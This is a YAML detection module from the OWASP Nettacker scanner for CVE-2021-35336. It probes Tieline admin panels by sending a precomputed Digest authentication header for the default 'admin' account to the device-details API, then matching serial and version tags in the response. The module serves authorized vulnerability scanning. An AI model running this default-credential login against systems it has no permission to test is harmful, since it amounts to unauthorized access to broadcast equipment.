Nettacker/nettacker/modules/vuln/tieline_cve_2021_35336.yaml

65 lines
1.9 KiB
YAML

info:
name: tieline_cve_2021_35336_vuln
author: OWASP Nettacker Team
severity: 9
description: Finding the Tieline Admin Panels with default credentials.
reference:
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
profiles:
- vuln
- http
- critical_severity
- cve2021
- cve
- tieline
payloads:
- library: http
steps:
- method: get
timeout: 3
headers:
Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
Referer:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/assets/base/home.html"
prefix: ""
suffix: ""
interceptors:
data:
schema:
- "http"
- "https"
ports:
- 80
- 443
allow_redirects: false
ssl: false
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/api/get_device_details"
prefix: ""
suffix: ""
interceptors:
data:
schema:
- "http"
- "https"
ports:
- 80
- 443
response:
condition_type: and
conditions:
status_code:
regex: '200'
reverse: false
header:
Content-type:
regex: text/xml
reverse: false
content:
regex: \<SERIAL\>&\<VERSION\>
reverse: false